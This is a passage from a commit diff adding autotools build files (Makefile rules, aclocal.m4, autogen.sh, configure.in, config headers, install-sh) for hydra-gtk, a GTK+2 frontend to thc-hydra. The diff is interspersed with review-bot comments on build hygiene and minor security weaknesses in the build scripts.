dvi-am:
dvi: dvi-recursive
check-am: all-am
check: check-recursive
installcheck-am:
installcheck: installcheck-recursive
all-recursive-am: config.h
$(MAKE) $(AM_MAKEFLAGS) all-recursive
install-exec-am:
install-exec: install-exec-recursive
install-data-am: install-data-local
install-data: install-data-recursive
install-am: all-am
@$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am
install: install-recursive
uninstall-am:
uninstall: uninstall-recursive
all-am: Makefile config.h
all-redirect: all-recursive-am
install-strip:
$(MAKE) $(AM_MAKEFLAGS) AM_INSTALL_PROGRAM_FLAGS=-s install
installdirs: installdirs-recursive
installdirs-am:
mostlyclean-generic:
clean-generic:
distclean-generic:
-rm -f Makefile $(CONFIG_CLEAN_FILES)
-rm -f config.cache config.log stamp-h stamp-h[0-9]*
maintainer-clean-generic:
mostlyclean-am: mostlyclean-hdr mostlyclean-tags mostlyclean-generic
mostlyclean: mostlyclean-recursive
clean-am: clean-hdr clean-tags clean-generic mostlyclean-am
clean: clean-recursive
distclean-am: distclean-hdr distclean-tags distclean-generic clean-am
distclean: distclean-recursive
-rm -f config.status
maintainer-clean-am: maintainer-clean-hdr maintainer-clean-tags \
maintainer-clean-generic distclean-am
@echo "This command is intended for maintainers to use;"
@echo "it deletes files that may require special tools to rebuild."
maintainer-clean: maintainer-clean-recursive
-rm -f config.status
.PHONY: mostlyclean-hdr distclean-hdr clean-hdr maintainer-clean-hdr \
install-data-recursive uninstall-data-recursive install-exec-recursive \
uninstall-exec-recursive installdirs-recursive uninstalldirs-recursive \
all-recursive check-recursive installcheck-recursive info-recursive \
dvi-recursive mostlyclean-recursive distclean-recursive clean-recursive \
maintainer-clean-recursive tags tags-recursive mostlyclean-tags \
distclean-tags clean-tags maintainer-clean-tags distdir info-am info \
dvi-am dvi check check-am installcheck-am installcheck all-recursive-am \
install-exec-am install-exec install-data-local install-data-am \
install-data install-am install uninstall-am uninstall all-redirect \
all-am all installdirs-am installdirs mostlyclean-generic \
distclean-generic clean-generic maintainer-clean-generic clean \
mostlyclean distclean maintainer-clean
install-data-local:
@$(NORMAL_INSTALL)
if test -d $(srcdir)/pixmaps; then \
$(mkinstalldirs) $(DESTDIR)$(pkgdatadir)/pixmaps; \
for pixmap in $(srcdir)/pixmaps/*; do \
if test -f $$pixmap; then \
$(INSTALL_DATA) $$pixmap $(DESTDIR)$(pkgdatadir)/pixmaps; \
fi \
done \
fi
dist-hook:
if test -d pixmaps; then \
mkdir $(distdir)/pixmaps; \
for pixmap in pixmaps/*; do \
if test -f $$pixmap; then \
cp -p $$pixmap $(distdir)/pixmaps; \
fi \
done \
fi
# Tell versions [3.59,3.63) of GNU make to not export all variables.
# Otherwise a system limit (for SysV at least) may be exceeded.
.NOEXPORT:
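
Review bot: the `distdir` rule runs `-chmod 777 $(distdir)` and, in the `SUBDIRS` loop, `chmod 777 $(distdir)/$$subdir`, so the staging tree stays world-writable until `dist` tars it up. On a shared build host any local user can add or replace files that end up in the release tarball. Create the directories with mode 755 (or build under a restrictive umask). Since these rules are automake output, it would also be better to regenerate them at build time than to carry them in the repository.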

0
hydra-gtk/NEWS Executable file

19
hydra-gtk/README Executable file

@ -0,0 +1,19 @@
Hydra-GTK
Gtk+2 frontend for thc-hydra
To install just do a:
./configure
make
su root
make install
Easy at it can be... You need thc-hydra installed to make this work.
This is my second gtk+2 program, so I am waiting for a lot of patches :)
Mail them to snakebyte@gmx.de
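
Review bot: the install steps do not list the build prerequisites. `configure.in` in this commit requires `gtk+-2.0 >= 2.0.0` through pkg-config, so the README should name the GTK+ 2 development files and pkg-config alongside thc-hydra. "Easy at it can be" should read "Easy as it can be".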

7
hydra-gtk/acconfig.h Executable file

@ -0,0 +1,7 @@
#undef ENABLE_NLS
#undef HAVE_CATGETS
#undef HAVE_GETTEXT
#undef GETTEXT_PACKAGE
#undef HAVE_LC_MESSAGES
#undef HAVE_STPCPY
#undef HAVE_LIBSM

363
hydra-gtk/aclocal.m4 vendored Executable file

@ -0,0 +1,363 @@
dnl aclocal.m4 generated automatically by aclocal 1.4-p6
dnl Copyright (C) 1994, 1995-8, 1999, 2001 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
dnl with or without modifications, as long as this notice is preserved.
dnl This program is distributed in the hope that it will be useful,
dnl but WITHOUT ANY WARRANTY, to the extent permitted by law; without
dnl even the implied warranty of MERCHANTABILITY or FITNESS FOR A
dnl PARTICULAR PURPOSE.
# Do all the work for Automake. This macro actually does too much --
# some checks are only needed if your package does certain things.
# But this isn't really a big deal.
# serial 1
dnl Usage:
dnl AM_INIT_AUTOMAKE(package,version, [no-define])
AC_DEFUN([AM_INIT_AUTOMAKE],
[AC_REQUIRE([AM_SET_CURRENT_AUTOMAKE_VERSION])dnl
AC_REQUIRE([AC_PROG_INSTALL])
PACKAGE=[$1]
AC_SUBST(PACKAGE)
VERSION=[$2]
AC_SUBST(VERSION)
dnl test to see if srcdir already configured
if test "`cd $srcdir && pwd`" != "`pwd`" && test -f $srcdir/config.status; then
AC_MSG_ERROR([source directory already configured; run "make distclean" there first])
fi
ifelse([$3],,
AC_DEFINE_UNQUOTED(PACKAGE, "$PACKAGE", [Name of package])
AC_DEFINE_UNQUOTED(VERSION, "$VERSION", [Version number of package]))
AC_REQUIRE([AM_SANITY_CHECK])
AC_REQUIRE([AC_ARG_PROGRAM])
dnl FIXME This is truly gross.
missing_dir=`cd $ac_aux_dir && pwd`
AM_MISSING_PROG(ACLOCAL, aclocal-${am__api_version}, $missing_dir)
AM_MISSING_PROG(AUTOCONF, autoconf, $missing_dir)
AM_MISSING_PROG(AUTOMAKE, automake-${am__api_version}, $missing_dir)
AM_MISSING_PROG(AUTOHEADER, autoheader, $missing_dir)
AM_MISSING_PROG(MAKEINFO, makeinfo, $missing_dir)
AC_REQUIRE([AC_PROG_MAKE_SET])])
# Copyright 2002 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# AM_AUTOMAKE_VERSION(VERSION)
# ----------------------------
# Automake X.Y traces this macro to ensure aclocal.m4 has been
# generated from the m4 files accompanying Automake X.Y.
AC_DEFUN([AM_AUTOMAKE_VERSION],[am__api_version="1.4"])
# AM_SET_CURRENT_AUTOMAKE_VERSION
# -------------------------------
# Call AM_AUTOMAKE_VERSION so it can be traced.
# This function is AC_REQUIREd by AC_INIT_AUTOMAKE.
AC_DEFUN([AM_SET_CURRENT_AUTOMAKE_VERSION],
[AM_AUTOMAKE_VERSION([1.4-p6])])
#
# Check to make sure that the build environment is sane.
#
AC_DEFUN([AM_SANITY_CHECK],
[AC_MSG_CHECKING([whether build environment is sane])
# Just in case
sleep 1
echo timestamp > conftestfile
# Do `set' in a subshell so we don't clobber the current shell's
# arguments. Must try -L first in case configure is actually a
# symlink; some systems play weird games with the mod time of symlinks
# (eg FreeBSD returns the mod time of the symlink's containing
# directory).
if (
set X `ls -Lt $srcdir/configure conftestfile 2> /dev/null`
if test "[$]*" = "X"; then
# -L didn't work.
set X `ls -t $srcdir/configure conftestfile`
fi
if test "[$]*" != "X $srcdir/configure conftestfile" \
&& test "[$]*" != "X conftestfile $srcdir/configure"; then
# If neither matched, then we have a broken ls. This can happen
# if, for instance, CONFIG_SHELL is bash and it inherits a
# broken ls alias from the environment. This has actually
# happened. Such a system could not be considered "sane".
AC_MSG_ERROR([ls -t appears to fail. Make sure there is not a broken
alias in your environment])
fi
test "[$]2" = conftestfile
)
then
# Ok.
:
else
AC_MSG_ERROR([newly created file is older than distributed files!
Check your system clock])
fi
rm -f conftest*
AC_MSG_RESULT(yes)])
dnl AM_MISSING_PROG(NAME, PROGRAM, DIRECTORY)
dnl The program must properly implement --version.
AC_DEFUN([AM_MISSING_PROG],
[AC_MSG_CHECKING(for working $2)
# Run test in a subshell; some versions of sh will print an error if
# an executable is not found, even if stderr is redirected.
# Redirect stdin to placate older versions of autoconf. Sigh.
if ($2 --version) < /dev/null > /dev/null 2>&1; then
$1=$2
AC_MSG_RESULT(found)
else
$1="$3/missing $2"
AC_MSG_RESULT(missing)
fi
AC_SUBST($1)])
# Like AC_CONFIG_HEADER, but automatically create stamp file.
AC_DEFUN([AM_CONFIG_HEADER],
[AC_PREREQ([2.12])
AC_CONFIG_HEADER([$1])
dnl When config.status generates a header, we must update the stamp-h file.
dnl This file resides in the same directory as the config header
dnl that is generated. We must strip everything past the first ":",
dnl and everything past the last "/".
AC_OUTPUT_COMMANDS(changequote(<<,>>)dnl
ifelse(patsubst(<<$1>>, <<[^ ]>>, <<>>), <<>>,
<<test -z "<<$>>CONFIG_HEADERS" || echo timestamp > patsubst(<<$1>>, <<^\([^:]*/\)?.*>>, <<\1>>)stamp-h<<>>dnl>>,
<<am_indx=1
for am_file in <<$1>>; do
case " <<$>>CONFIG_HEADERS " in
*" <<$>>am_file "*<<)>>
echo timestamp > `echo <<$>>am_file | sed -e 's%:.*%%' -e 's%[^/]*$%%'`stamp-h$am_indx
;;
esac
am_indx=`expr "<<$>>am_indx" + 1`
done<<>>dnl>>)
changequote([,]))])
# Add --enable-maintainer-mode option to configure.
# From Jim Meyering
# serial 1
AC_DEFUN([AM_MAINTAINER_MODE],
[AC_MSG_CHECKING([whether to enable maintainer-specific portions of Makefiles])
dnl maintainer-mode is disabled by default
AC_ARG_ENABLE(maintainer-mode,
[ --enable-maintainer-mode enable make rules and dependencies not useful
(and sometimes confusing) to the casual installer],
USE_MAINTAINER_MODE=$enableval,
USE_MAINTAINER_MODE=no)
AC_MSG_RESULT($USE_MAINTAINER_MODE)
AM_CONDITIONAL(MAINTAINER_MODE, test $USE_MAINTAINER_MODE = yes)
MAINT=$MAINTAINER_MODE_TRUE
AC_SUBST(MAINT)dnl
]
)
# Define a conditional.
AC_DEFUN([AM_CONDITIONAL],
[AC_SUBST($1_TRUE)
AC_SUBST($1_FALSE)
if $2; then
$1_TRUE=
$1_FALSE='#'
else
$1_TRUE='#'
$1_FALSE=
fi])
# isc-posix.m4 serial 2 (gettext-0.11.2)
dnl Copyright (C) 1995-2002 Free Software Foundation, Inc.
dnl This file is free software, distributed under the terms of the GNU
dnl General Public License. As a special exception to the GNU General
dnl Public License, this file may be distributed as part of a program
dnl that contains a configuration script generated by Autoconf, under
dnl the same distribution terms as the rest of that program.
# This file is not needed with autoconf-2.53 and newer. Remove it in 2005.
# This test replaces the one in autoconf.
# Currently this macro should have the same name as the autoconf macro
# because gettext's gettext.m4 (distributed in the automake package)
# still uses it. Otherwise, the use in gettext.m4 makes autoheader
# give these diagnostics:
# configure.in:556: AC_TRY_COMPILE was called before AC_ISC_POSIX
# configure.in:556: AC_TRY_RUN was called before AC_ISC_POSIX
undefine([AC_ISC_POSIX])
AC_DEFUN([AC_ISC_POSIX],
[
dnl This test replaces the obsolescent AC_ISC_POSIX kludge.
AC_CHECK_LIB(cposix, strerror, [LIBS="$LIBS -lcposix"])
]
)
# serial 1
# @defmac AC_PROG_CC_STDC
# @maindex PROG_CC_STDC
# @ovindex CC
# If the C compiler in not in ANSI C mode by default, try to add an option
# to output variable @code{CC} to make it so. This macro tries various
# options that select ANSI C on some system or another. It considers the
# compiler to be in ANSI C mode if it handles function prototypes correctly.
#
# If you use this macro, you should check after calling it whether the C
# compiler has been set to accept ANSI C; if not, the shell variable
# @code{am_cv_prog_cc_stdc} is set to @samp{no}. If you wrote your source
# code in ANSI C, you can make an un-ANSIfied copy of it by using the
# program @code{ansi2knr}, which comes with Ghostscript.
# @end defmac
AC_DEFUN([AM_PROG_CC_STDC],
[AC_REQUIRE([AC_PROG_CC])
AC_BEFORE([$0], [AC_C_INLINE])
AC_BEFORE([$0], [AC_C_CONST])
dnl Force this before AC_PROG_CPP. Some cpp's, eg on HPUX, require
dnl a magic option to avoid problems with ANSI preprocessor commands
dnl like #elif.
dnl FIXME: can't do this because then AC_AIX won't work due to a
dnl circular dependency.
dnl AC_BEFORE([$0], [AC_PROG_CPP])
AC_MSG_CHECKING(for ${CC-cc} option to accept ANSI C)
AC_CACHE_VAL(am_cv_prog_cc_stdc,
[am_cv_prog_cc_stdc=no
ac_save_CC="$CC"
# Don't try gcc -ansi; that turns off useful extensions and
# breaks some systems' header files.
# AIX -qlanglvl=ansi
# Ultrix and OSF/1 -std1
# HP-UX -Aa -D_HPUX_SOURCE
# SVR4 -Xc -D__EXTENSIONS__
for ac_arg in "" -qlanglvl=ansi -std1 "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__"
do
CC="$ac_save_CC $ac_arg"
AC_TRY_COMPILE(
[#include <stdarg.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
/* Most of the following tests are stolen from RCS 5.7's src/conf.sh. */
struct buf { int x; };
FILE * (*rcsopen) (struct buf *, struct stat *, int);
static char *e (p, i)
char **p;
int i;
{
return p[i];
}
static char *f (char * (*g) (char **, int), char **p, ...)
{
char *s;
va_list v;
va_start (v,p);
s = g (p, va_arg (v,int));
va_end (v);
return s;
}
int test (int i, double x);
struct s1 {int (*f) (int a);};
struct s2 {int (*f) (double a);};
int pairnames (int, char **, FILE *(*)(struct buf *, struct stat *, int), int, int);
int argc;
char **argv;
], [
return f (e, argv, 0) != argv[0] || f (e, argv, 1) != argv[1];
],
[am_cv_prog_cc_stdc="$ac_arg"; break])
done
CC="$ac_save_CC"
])
if test -z "$am_cv_prog_cc_stdc"; then
AC_MSG_RESULT([none needed])
else
AC_MSG_RESULT($am_cv_prog_cc_stdc)
fi
case "x$am_cv_prog_cc_stdc" in
x|xno) ;;
*) CC="$CC $am_cv_prog_cc_stdc" ;;
esac
])
dnl PKG_CHECK_MODULES(GSTUFF, gtk+-2.0 >= 1.3 glib = 1.3.4, action-if, action-not)
dnl defines GSTUFF_LIBS, GSTUFF_CFLAGS, see pkg-config man page
dnl also defines GSTUFF_PKG_ERRORS on error
AC_DEFUN(PKG_CHECK_MODULES, [
succeeded=no
if test -z "$PKG_CONFIG"; then
AC_PATH_PROG(PKG_CONFIG, pkg-config, no)
fi
if test "$PKG_CONFIG" = "no" ; then
echo "*** The pkg-config script could not be found. Make sure it is"
echo "*** in your path, or set the PKG_CONFIG environment variable"
echo "*** to the full path to pkg-config."
echo "*** Or see http://www.freedesktop.org/software/pkgconfig to get pkg-config."
else
PKG_CONFIG_MIN_VERSION=0.9.0
if $PKG_CONFIG --atleast-pkgconfig-version $PKG_CONFIG_MIN_VERSION; then
AC_MSG_CHECKING(for $2)
if $PKG_CONFIG --exists "$2" ; then
AC_MSG_RESULT(yes)
succeeded=yes
AC_MSG_CHECKING($1_CFLAGS)
$1_CFLAGS=`$PKG_CONFIG --cflags "$2"`
AC_MSG_RESULT($$1_CFLAGS)
AC_MSG_CHECKING($1_LIBS)
$1_LIBS=`$PKG_CONFIG --libs "$2"`
AC_MSG_RESULT($$1_LIBS)
else
$1_CFLAGS=""
$1_LIBS=""
## If we have a custom action on failure, don't print errors, but
## do set a variable so people can do so.
$1_PKG_ERRORS=`$PKG_CONFIG --errors-to-stdout --print-errors "$2"`
ifelse([$4], ,echo $$1_PKG_ERRORS,)
fi
AC_SUBST($1_CFLAGS)
AC_SUBST($1_LIBS)
else
echo "*** Your version of pkg-config is too old. You need version $PKG_CONFIG_MIN_VERSION or newer."
echo "*** See http://www.freedesktop.org/software/pkgconfig"
fi
fi
if test $succeeded = yes; then
ifelse([$3], , :, [$3])
else
ifelse([$4], , AC_MSG_ERROR([Library requirements ($2) not met; consider adjusting the PKG_CONFIG_PATH environment variable if your libraries are in a nonstandard prefix so pkg-config can find them.]), [$4])
fi
])
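
Review bot: `AC_DEFUN(PKG_CHECK_MODULES, [` leaves the macro name unquoted, unlike every other definition in this file (`AC_DEFUN([AM_INIT_AUTOMAKE],` and so on); it should be `AC_DEFUN([PKG_CHECK_MODULES], [`. In the same macro the failure path runs `echo $$1_PKG_ERRORS` unquoted, so multi-line pkg-config diagnostics are collapsed onto one line. The first line says the file was generated by aclocal 1.4-p6, so the fix belongs in the macro source and the file should be regenerated rather than edited in place.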

159
hydra-gtk/autogen.sh Executable file

@ -0,0 +1,159 @@
#!/bin/sh
# Run this to generate all the initial makefiles, etc.
srcdir=`dirname $0`
test -z "$srcdir" && srcdir=.
DIE=0
if [ -n "$GNOME2_DIR" ]; then
ACLOCAL_FLAGS="-I $GNOME2_DIR/share/aclocal $ACLOCAL_FLAGS"
LD_LIBRARY_PATH="$GNOME2_DIR/lib:$LD_LIBRARY_PATH"
PATH="$GNOME2_DIR/bin:$PATH"
export PATH
export LD_LIBRARY_PATH
fi
(test -f $srcdir/configure.in) || {
echo -n "**Error**: Directory "\`$srcdir\'" does not look like the"
echo " top-level package directory"
exit 1
}
(autoconf --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`autoconf' installed."
echo "Download the appropriate package for your distribution,"
echo "or get the source tarball at ftp://ftp.gnu.org/pub/gnu/"
DIE=1
}
(grep "^AC_PROG_INTLTOOL" $srcdir/configure.in >/dev/null) && {
(intltoolize --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`intltool' installed."
echo "You can get it from:"
echo " ftp://ftp.gnome.org/pub/GNOME/"
DIE=1
}
}
(grep "^AM_PROG_XML_I18N_TOOLS" $srcdir/configure.in >/dev/null) && {
(xml-i18n-toolize --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`xml-i18n-toolize' installed."
echo "You can get it from:"
echo " ftp://ftp.gnome.org/pub/GNOME/"
DIE=1
}
}
(grep "^AM_PROG_LIBTOOL" $srcdir/configure.in >/dev/null) && {
(libtool --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`libtool' installed."
echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/"
DIE=1
}
}
(grep "^AM_GLIB_GNU_GETTEXT" $srcdir/configure.in >/dev/null) && {
(grep "sed.*POTFILES" $srcdir/configure.in) > /dev/null || \
(glib-gettextize --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`glib' installed."
echo "You can get it from: ftp://ftp.gtk.org/pub/gtk"
DIE=1
}
}
(automake --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: You must have \`automake' installed."
echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/"
DIE=1
NO_AUTOMAKE=yes
}
# if no automake, don't bother testing for aclocal
test -n "$NO_AUTOMAKE" || (aclocal --version) < /dev/null > /dev/null 2>&1 || {
echo
echo "**Error**: Missing \`aclocal'. The version of \`automake'"
echo "installed doesn't appear recent enough."
echo "You can get automake from ftp://ftp.gnu.org/pub/gnu/"
DIE=1
}
if test "$DIE" -eq 1; then
exit 1
fi
if test -z "$*"; then
echo "**Warning**: I am going to run \`configure' with no arguments."
echo "If you wish to pass any to it, please specify them on the"
echo \`$0\'" command line."
echo
fi
case $CC in
xlc )
am_opt=--include-deps;;
esac
for coin in `find $srcdir -path $srcdir/CVS -prune -o -name configure.in -print`
do
dr=`dirname $coin`
if test -f $dr/NO-AUTO-GEN; then
echo skipping $dr -- flagged as no auto-gen
else
echo processing $dr
( cd $dr
aclocalinclude="$ACLOCAL_FLAGS"
if grep "^AM_GLIB_GNU_GETTEXT" configure.in >/dev/null; then
echo "Creating $dr/aclocal.m4 ..."
test -r $dr/aclocal.m4 || touch $dr/aclocal.m4
echo "Running glib-gettextize... Ignore non-fatal messages."
echo "no" | glib-gettextize --force --copy
echo "Making $dr/aclocal.m4 writable ..."
test -r $dr/aclocal.m4 && chmod u+w $dr/aclocal.m4
fi
if grep "^AC_PROG_INTLTOOL" configure.in >/dev/null; then
echo "Running intltoolize..."
intltoolize --copy --force --automake
fi
if grep "^AM_PROG_XML_I18N_TOOLS" configure.in >/dev/null; then
echo "Running xml-i18n-toolize..."
xml-i18n-toolize --copy --force --automake
fi
if grep "^AM_PROG_LIBTOOL" configure.in >/dev/null; then
if test -z "$NO_LIBTOOLIZE" ; then
echo "Running libtoolize..."
libtoolize --force --copy
fi
fi
echo "Running aclocal $aclocalinclude ..."
aclocal $aclocalinclude
if grep "^AM_CONFIG_HEADER" configure.in >/dev/null; then
echo "Running autoheader..."
autoheader
fi
echo "Running automake --gnu $am_opt ..."
automake --add-missing --gnu $am_opt
echo "Running autoconf ..."
autoconf
)
fi
done
conf_flags="--enable-maintainer-mode"
if test x$NOCONFIGURE = x; then
echo Running $srcdir/configure $conf_flags "$@" ...
$srcdir/configure $conf_flags "$@" \
&& echo Now type \`make\' to compile. || exit 1
else
echo Skipping configure process.
fi
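
Review bot: `LD_LIBRARY_PATH="$GNOME2_DIR/lib:$LD_LIBRARY_PATH"` leaves a trailing colon when `LD_LIBRARY_PATH` was unset or empty, and the dynamic loader treats an empty entry as the current working directory, so every tool the script runs afterwards may load shared objects from whichever directory it was started in. Append the old value only when it is non-empty, e.g. `"$GNOME2_DIR/lib${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}"`. Inside the loop, `test -r $dr/aclocal.m4 || touch $dr/aclocal.m4` runs after `cd $dr`, so with a relative `$srcdir` it refers to the wrong path; plain `aclocal.m4` is what is meant. `$srcdir`, `$dr` and `$0` are expanded unquoted throughout, which breaks on checkout paths that contain spaces.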

33
hydra-gtk/config.h Executable file

@ -0,0 +1,33 @@
/* config.h. Generated by configure. */
/* config.h.in. Generated from configure.in by autoheader. */
/* #undef ENABLE_NLS */
/* #undef HAVE_CATGETS */
/* #undef HAVE_GETTEXT */
/* #undef GETTEXT_PACKAGE */
/* #undef HAVE_LC_MESSAGES */
/* #undef HAVE_STPCPY */
/* #undef HAVE_LIBSM */
/* Name of package */
#define PACKAGE "xhydra"
/* Define to the address where bug reports for this package should be sent. */
#define PACKAGE_BUGREPORT ""
/* Define to the full name of this package. */
#define PACKAGE_NAME ""
/* Define to the full name and version of this package. */
#define PACKAGE_STRING ""
/* Define to the one symbol short name of this package. */
#define PACKAGE_TARNAME ""
/* Define to the version of this package. */
#define PACKAGE_VERSION ""
/* Define to 1 if you have the ANSI C header files. */
#define STDC_HEADERS 1
/* Version number of package */
#define VERSION "0.1"
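
Review bot: the first comment marks this file as "Generated by configure", so it is the output of one machine's configure run and not a source file. `config.h.in` is the input that belongs in the repository. Drop `config.h` from the commit and add it to the ignore list.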

32
hydra-gtk/config.h.in Executable file

@ -0,0 +1,32 @@
/* config.h.in. Generated from configure.in by autoheader. */
#undef ENABLE_NLS
#undef HAVE_CATGETS
#undef HAVE_GETTEXT
#undef GETTEXT_PACKAGE
#undef HAVE_LC_MESSAGES
#undef HAVE_STPCPY
#undef HAVE_LIBSM
/* Name of package */
#undef PACKAGE
/* Define to the address where bug reports for this package should be sent. */
#undef PACKAGE_BUGREPORT
/* Define to the full name of this package. */
#undef PACKAGE_NAME
/* Define to the full name and version of this package. */
#undef PACKAGE_STRING
/* Define to the one symbol short name of this package. */
#undef PACKAGE_TARNAME
/* Define to the version of this package. */
#undef PACKAGE_VERSION
/* Define to 1 if you have the ANSI C header files. */
#undef STDC_HEADERS
/* Version number of package */
#undef VERSION

5203
hydra-gtk/configure vendored Executable file

File diff suppressed because it is too large

22
hydra-gtk/configure.in Executable file

@ -0,0 +1,22 @@
dnl Process this file with autoconf to produce a configure script.
AC_INIT(configure.in)
AM_INIT_AUTOMAKE(xhydra, 0.1)
AM_CONFIG_HEADER(config.h)
AM_MAINTAINER_MODE
AC_ISC_POSIX
AC_PROG_CC
AM_PROG_CC_STDC
AC_HEADER_STDC
pkg_modules="gtk+-2.0 >= 2.0.0"
PKG_CHECK_MODULES(PACKAGE, [$pkg_modules])
AC_SUBST(PACKAGE_CFLAGS)
AC_SUBST(PACKAGE_LIBS)
AC_OUTPUT([
Makefile
src/Makefile
])
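
Review bot: `PKG_CHECK_MODULES(PACKAGE, [$pkg_modules])` uses `PACKAGE` as the variable prefix, the same name `AM_INIT_AUTOMAKE(xhydra, 0.1)` sets for the package, and the resulting `PACKAGE_CFLAGS` and `PACKAGE_LIBS` land in the `PACKAGE_*` namespace that `config.h.in` already uses for `PACKAGE_NAME`, `PACKAGE_VERSION` and the rest. A dedicated prefix such as `GTK` would avoid the confusion. The two `AC_SUBST` lines that follow are redundant, because the `PKG_CHECK_MODULES` definition in `aclocal.m4` already substitutes `$1_CFLAGS` and `$1_LIBS`.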

251
hydra-gtk/install-sh Executable file

@ -0,0 +1,251 @@
#!/bin/sh
#
# install - install a program, script, or datafile
# This comes from X11R5 (mit/util/scripts/install.sh).
#
# Copyright 1991 by the Massachusetts Institute of Technology
#
# Permission to use, copy, modify, distribute, and sell this software and its
# documentation for any purpose is hereby granted without fee, provided that
# the above copyright notice appear in all copies and that both that
# copyright notice and this permission notice appear in supporting
# documentation, and that the name of M.I.T. not be used in advertising or
# publicity pertaining to distribution of the software without specific,
# written prior permission. M.I.T. makes no representations about the
# suitability of this software for any purpose. It is provided "as is"
# without express or implied warranty.
#
# Calling this script install-sh is preferred over install.sh, to prevent
# `make' implicit rules from creating a file called install from it
# when there is no Makefile.
#
# This script is compatible with the BSD install script, but was written
# from scratch. It can only install one file at a time, a restriction
# shared with many OS's install programs.
# set DOITPROG to echo to test this script
# Don't use :- since 4.3BSD and earlier shells don't like it.
doit="${DOITPROG-}"
# put in absolute paths if you don't have them in your path; or use env. vars.
mvprog="${MVPROG-mv}"
cpprog="${CPPROG-cp}"
chmodprog="${CHMODPROG-chmod}"
chownprog="${CHOWNPROG-chown}"
chgrpprog="${CHGRPPROG-chgrp}"
stripprog="${STRIPPROG-strip}"
rmprog="${RMPROG-rm}"
mkdirprog="${MKDIRPROG-mkdir}"
transformbasename=""
transform_arg=""
instcmd="$mvprog"
chmodcmd="$chmodprog 0755"
chowncmd=""
chgrpcmd=""
stripcmd=""
rmcmd="$rmprog -f"
mvcmd="$mvprog"
src=""
dst=""
dir_arg=""
while [ x"$1" != x ]; do
case $1 in
-c) instcmd="$cpprog"
shift
continue;;
-d) dir_arg=true
shift
continue;;
-m) chmodcmd="$chmodprog $2"
shift
shift
continue;;
-o) chowncmd="$chownprog $2"
shift
shift
continue;;
-g) chgrpcmd="$chgrpprog $2"
shift
shift
continue;;
-s) stripcmd="$stripprog"
shift
continue;;
-t=*) transformarg=`echo $1 | sed 's/-t=//'`
shift
continue;;
-b=*) transformbasename=`echo $1 | sed 's/-b=//'`
shift
continue;;
*) if [ x"$src" = x ]
then
src=$1
else
# this colon is to work around a 386BSD /bin/sh bug
:
dst=$1
fi
shift
continue;;
esac
done
if [ x"$src" = x ]
then
echo "install: no input file specified"
exit 1
else
true
fi
if [ x"$dir_arg" != x ]; then
dst=$src
src=""
if [ -d $dst ]; then
instcmd=:
chmodcmd=""
else
instcmd=mkdir
fi
else
# Waiting for this to be detected by the "$instcmd $src $dsttmp" command
# might cause directories to be created, which would be especially bad
# if $src (and thus $dsttmp) contains '*'.
if [ -f $src -o -d $src ]
then
true
else
echo "install: $src does not exist"
exit 1
fi
if [ x"$dst" = x ]
then
echo "install: no destination specified"
exit 1
else
true
fi
# If destination is a directory, append the input filename; if your system
# does not like double slashes in filenames, you may need to add some logic
if [ -d $dst ]
then
dst="$dst"/`basename $src`
else
true
fi
fi
## this sed command emulates the dirname command
dstdir=`echo $dst | sed -e 's,[^/]*$,,;s,/$,,;s,^$,.,'`
# Make sure that the destination directory exists.
# this part is taken from Noah Friedman's mkinstalldirs script
# Skip lots of stat calls in the usual case.
if [ ! -d "$dstdir" ]; then
defaultIFS='
'
IFS="${IFS-${defaultIFS}}"
oIFS="${IFS}"
# Some sh's can't handle IFS=/ for some reason.
IFS='%'
set - `echo ${dstdir} | sed -e 's@/@%@g' -e 's@^%@/@'`
IFS="${oIFS}"
pathcomp=''
while [ $# -ne 0 ] ; do
pathcomp="${pathcomp}${1}"
shift
if [ ! -d "${pathcomp}" ] ;
then
$mkdirprog "${pathcomp}"
else
true
fi
pathcomp="${pathcomp}/"
done
fi
if [ x"$dir_arg" != x ]
then
$doit $instcmd $dst &&
if [ x"$chowncmd" != x ]; then $doit $chowncmd $dst; else true ; fi &&
if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dst; else true ; fi &&
if [ x"$stripcmd" != x ]; then $doit $stripcmd $dst; else true ; fi &&
if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dst; else true ; fi
else
# If we're going to rename the final executable, determine the name now.
if [ x"$transformarg" = x ]
then
dstfile=`basename $dst`
else
dstfile=`basename $dst $transformbasename |
sed $transformarg`$transformbasename
fi
# don't allow the sed command to completely eliminate the filename
if [ x"$dstfile" = x ]
then
dstfile=`basename $dst`
else
true
fi
# Make a temp file name in the proper directory.
dsttmp=$dstdir/#inst.$$#
# Move or copy the file name to the temp name
$doit $instcmd $src $dsttmp &&
trap "rm -f ${dsttmp}" 0 &&
# and set any options; do chmod last to preserve setuid bits
# If any of these fail, we abort the whole thing. If we want to
# ignore errors from any of these, just make sure not to ignore
# errors from the above "$doit $instcmd $src $dsttmp" command.
if [ x"$chowncmd" != x ]; then $doit $chowncmd $dsttmp; else true;fi &&
if [ x"$chgrpcmd" != x ]; then $doit $chgrpcmd $dsttmp; else true;fi &&
if [ x"$stripcmd" != x ]; then $doit $stripcmd $dsttmp; else true;fi &&
if [ x"$chmodcmd" != x ]; then $doit $chmodcmd $dsttmp; else true;fi &&
# Now rename the file to the real destination.
$doit $rmcmd -f $dstdir/$dstfile &&
